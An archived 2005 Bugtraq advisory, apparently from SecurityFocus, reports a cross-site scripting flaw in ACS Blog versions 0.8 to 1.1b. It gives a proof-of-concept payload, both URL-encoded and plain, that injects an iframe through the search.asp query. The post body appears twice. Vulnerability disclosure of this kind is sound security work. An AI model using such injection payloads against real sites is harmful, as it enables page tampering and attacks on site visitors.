Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
XSS in ACS blog
Mar 17 2005 08:24AM
farhad koosha (farhadkey yahoo com)
XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).
Vulnerable :
ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b
Code :
/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com
%22%3E%3C%2Fiframe%3E
or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>
Vendor URL : http://www.asppress.com
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).
Vulnerable :
ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b
Code :
/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com
%22%3E%3C%2Fiframe%3E
or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>
Vendor URL : http://www.asppress.com
[ reply ]